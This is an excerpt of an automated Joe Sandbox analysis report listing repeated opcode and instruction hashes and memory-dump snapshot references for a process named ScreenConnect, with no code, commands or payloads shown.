                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: eb82e45ef3354dc071d662263b64daa1b81ddb25549fa2c59a3ccde120751939
                                                                                                                                                                                                                                                          • Instruction ID: bff98fb03548b4596ce8ba13f7f62782890bc65ba7978801a1c0ffd68971604e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb82e45ef3354dc071d662263b64daa1b81ddb25549fa2c59a3ccde120751939
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A51343470030A9FDB15DFA8C894A6AB7F6FF88610714846CE546CF326EB74EC028B91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0745e7309d3ab53bb5c93e40b9675cbf7eb0b3499ac279f4d5b5eaf88e03fbab
                                                                                                                                                                                                                                                          • Instruction ID: 3263d6307ef6267da4d22a824618c9c905be27e109a448b78e8ead4aa331c71c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0745e7309d3ab53bb5c93e40b9675cbf7eb0b3499ac279f4d5b5eaf88e03fbab
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7651F034700305EFC711EBB89951AAE77E6AFC5620B18C569D415DF381EF30DD098B92
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 79fd4064685d2c7ee286c2b24e6f502aec7c5ae85ac7eaa3c070f3d13d425164
                                                                                                                                                                                                                                                          • Instruction ID: 3a618104cb564f82d9029d61fb018f523e72d1e81c3b0e55fa048fc344c69dc9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79fd4064685d2c7ee286c2b24e6f502aec7c5ae85ac7eaa3c070f3d13d425164
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 865135347007068FDB24DF29D880A5AF7F6FF887207148A58E596DB7A4EB30E9058F90
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b29daf80591fae036d81745bb8201e864264a048edb8735768d0b6d10160a0fa
                                                                                                                                                                                                                                                          • Instruction ID: 0d9c61203bffcdbb086f4c2d521e0cc8a53697e3d456b4ccdbeff9646a75c20f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b29daf80591fae036d81745bb8201e864264a048edb8735768d0b6d10160a0fa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 934161716047808FD712DF68D8A0595BBF1FF8A6247264ACED095CF7A2D730E809CB55
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2e29cbea5f37b233834a6e1f1b7bad8d3c8f8459212581c1d351284afef75b9a
                                                                                                                                                                                                                                                          • Instruction ID: 89ea84a2ff373388577b13139d012a628a6d670c10b08155598891308b156a45
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e29cbea5f37b233834a6e1f1b7bad8d3c8f8459212581c1d351284afef75b9a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A510774600B018FD724CF69D884A6AB7F2FF89724B245A5CE596CB7A4DB31E842CB44
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 08c7d481093eceabdcc3a087cb8c25e6a7b22e50c8794cf364b8c4169062dd81
                                                                                                                                                                                                                                                          • Instruction ID: 85b722bbeade397facb7bf58d6f2d496247ef7c74dc3bdcf514024e1363839cb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08c7d481093eceabdcc3a087cb8c25e6a7b22e50c8794cf364b8c4169062dd81
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3412134700341AFC712EBB88950A6EB7E6BFC5620B18C569D412DF385DF70DD0A8B92
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3c4f516b503f367fc487d228d68d5b795ce4a85ed742e8c7cad7d34a3a580131
                                                                                                                                                                                                                                                          • Instruction ID: e9405f2d3ea3a1b32dda3d3e8f192fa54c1b79e910a72e1a51c0007693440b4a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c4f516b503f367fc487d228d68d5b795ce4a85ed742e8c7cad7d34a3a580131
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3515870E003099FDB00EFB4D844BDDBBB2EF89710F108559E004AB290EB74A959DFA1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2c7470cf93909f32b96ebf80bb4d253dad47e0679c1ed4c173813bff99b7b8d1
                                                                                                                                                                                                                                                          • Instruction ID: 3d43c058ac42eb0dd0aef84bd096f34e9c3f169b677852d4195b88d78742bbbe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c7470cf93909f32b96ebf80bb4d253dad47e0679c1ed4c173813bff99b7b8d1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F513870E003099FDB00EFA4D844BDDBBB2FF89710F208559E005AB290EB74A959DF95
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8ed848287092cd6cee76335ca24f00a8602865a8f4c0e7477748cf31595f6829
                                                                                                                                                                                                                                                          • Instruction ID: cdab592de649f014109d52e6604f96ecf6a768fddf62889ae5f80934067061eb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed848287092cd6cee76335ca24f00a8602865a8f4c0e7477748cf31595f6829
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E411974600B058FC778DF2AD84466BB7F1BF89224B144A6CE596DB7A4E730E906CB80
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 22e02758b38c85a46deb87b57b7127dd83cfd098504df7712c29a1e7e373806a
                                                                                                                                                                                                                                                          • Instruction ID: 73487ca0699381ea4c2f23f643bf4bffc0d4b7b30d7a5807cda1d77282651b2d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22e02758b38c85a46deb87b57b7127dd83cfd098504df7712c29a1e7e373806a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE412171E002199FDB15DFE9C881BDEBBB6FF89B00F14812AE505BB240DB71A945CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ad716545b2a7bfff115207ad031bb4461854acd025506352fa81e1a2726b5b45
                                                                                                                                                                                                                                                          • Instruction ID: a2024f6ffdd9b546a919ea74a4d8a050420b54cb50689b1dcbb174319c894b31
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad716545b2a7bfff115207ad031bb4461854acd025506352fa81e1a2726b5b45
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4141B031A00206CFDB15DFA8E4946AEBBB6FF88714B08C519D9059F356DB34D906CF91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1459a23241bf187fcd8bbb24a8a82f201afa7fc5d3beb3a9e47154040ef68097
                                                                                                                                                                                                                                                          • Instruction ID: 90cd07e21e7d394999f5b7415f00f17a7ba8dd4604c3d4078e058a91273710b2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1459a23241bf187fcd8bbb24a8a82f201afa7fc5d3beb3a9e47154040ef68097
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A417C71B102159FCB14DF69D894AADBBF2BF88724B14856CE406DB3A1DF709C05CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d9a96ffe6ddc6f978bce7b1655dccf9238822300e327f835878a07065acee8e0
                                                                                                                                                                                                                                                          • Instruction ID: 508f74719889caf145495d4c767edc8291a0405c9b186a905556f0c286326bb9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9a96ffe6ddc6f978bce7b1655dccf9238822300e327f835878a07065acee8e0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41E234B002558FD7209FA8D95476EBFE2BF80B04F18C96ED8558F292EB319C85C790
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cb3ff2a70bf565fbdc333f77293bd5b8e328392e3653bb21a9248cbaec2c8129
                                                                                                                                                                                                                                                          • Instruction ID: cd4d8df877607135751dec08337eaebe6ed6b905b0fa1f9dc6c6efa5c6a90f71
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb3ff2a70bf565fbdc333f77293bd5b8e328392e3653bb21a9248cbaec2c8129
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8413D706007058FD764DF2AC884A6BB7F6FF89360B14866CD596CB7A5E730E906CB90
Memory Dump Source
• Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4a2cbdb31349c2913f4cfe011bde8c18ccea3137db0ea240cabbad1622f63041
                                                                                                                                                                                                                                                          • Instruction ID: 0b4ced04f7491a1bfb515c5dbb5857663d0b55ea505693d6147e4a92a8a6db53
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a2cbdb31349c2913f4cfe011bde8c18ccea3137db0ea240cabbad1622f63041
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B31F534600B018FC774DF29D84865ABBF1AF88725B144A2CE556CB6F4DB70E949CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b24f232f9c0453b733bcca7cd77d0b68e74ca0f7bbe832a6c742a71545ed69ca
                                                                                                                                                                                                                                                          • Instruction ID: d0abe9f8c88f5d4bc5a6ef9d8165280aede430b80596eeec7ed4f5a41c7da529
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b24f232f9c0453b733bcca7cd77d0b68e74ca0f7bbe832a6c742a71545ed69ca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B231C070B046458FCB05DBA8D89466EFFB2FF8A710F1480AAD509DB395DA309C02CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 338bf43d5bf091e4df2332ed92609b0f338771777f622a10a66578d16b841759
                                                                                                                                                                                                                                                          • Instruction ID: d32eaff0a2d2e7b35d2e9b2cc5c8464d009b8489cd06bfdf21b4433ce3f8347d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 338bf43d5bf091e4df2332ed92609b0f338771777f622a10a66578d16b841759
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 753129312057456FD701EB34E8A0BD9BBB1FF82624F00855AE041CF292CB70AC0ACBDA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: abe018bd35b9e3aa2292f37a92e2d3ac6a71feb42bd14a2308f91cd81a1ce798
                                                                                                                                                                                                                                                          • Instruction ID: 318c0e6e14dd393baf590ec16c8982f39dce1a64f9e652c32dca6ebd74a4b0f8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abe018bd35b9e3aa2292f37a92e2d3ac6a71feb42bd14a2308f91cd81a1ce798
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 173106706007058FD730DF6AD844A6ABBF1BF89724B144A2CD496DB7A5DB30EA46CF80
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a68d87ca0e677533e6a593a124dc85949c7d559810fb5e5a8393d74662c14a71
                                                                                                                                                                                                                                                          • Instruction ID: 28eb10066692a03ace4f522dfe81464cc3345ac82898b9b6d5906889f0219caa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a68d87ca0e677533e6a593a124dc85949c7d559810fb5e5a8393d74662c14a71
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0131E674600B058FD730DFA9C8446AAB7F1BF49724B144A2CD4A6DB6A5D730E94ACFC4
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 97bba24039c2e2e319423429a4c75c8e547e5a0d4bc339379a4ed50b69da86c0
                                                                                                                                                                                                                                                          • Instruction ID: 6d9eebab583b43499b406a6be93ae527a964c8588428340a4d5a39787ba15bd5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97bba24039c2e2e319423429a4c75c8e547e5a0d4bc339379a4ed50b69da86c0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30312170A04309DFCB00EFB4E94865EBBB5FF46311B0485AAD915DB252EB309E00DBA2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 428afb36dc663780b5dfe4791c4e9edc69d08424374a253211ff8ca017a9abd8
                                                                                                                                                                                                                                                          • Instruction ID: 4e35c674e866faa43b74a0f4ecfcacf19f6aef563f48d11494d949f5599a116c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428afb36dc663780b5dfe4791c4e9edc69d08424374a253211ff8ca017a9abd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2316670600B018FC730CF69D888A6AB7F1FF89B24B144A2CD496DB7A0DB31E905CB91
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8e19d9d2c3c4b1263dc295cf0ef2c9307334a7d50ca4a1b4b3bb04eedee8b5d8
                                                                                                                                                                                                                                                          • Instruction ID: 88b1d5cf19caa9a65ab88d15c8301ba827953ec87986cd5383757448e046c55b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e19d9d2c3c4b1263dc295cf0ef2c9307334a7d50ca4a1b4b3bb04eedee8b5d8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F3123706007018FD730DFAAC8446AAB7F1BF89624B108A2CD496DB7A1D771E946CFC0
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1900276926.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d362316815482362fbf01d1471e50105c0dc5c586c44b7e79b8c0be4c1798da8
                                                                                                                                                                                                                                                          • Instruction ID: 08fe098c1c21a9185a0249e9ccce903ca1162ca6aaa7ec81d37668fe3bf53964
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d362316815482362fbf01d1471e50105c0dc5c586c44b7e79b8c0be4c1798da8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77117F716002099FCB10DFA4DC81AAEB7F5FF88620B008529E515EF315DB30ED018F95
                                                                                                                                                                                                                                                          Memory Dump Source
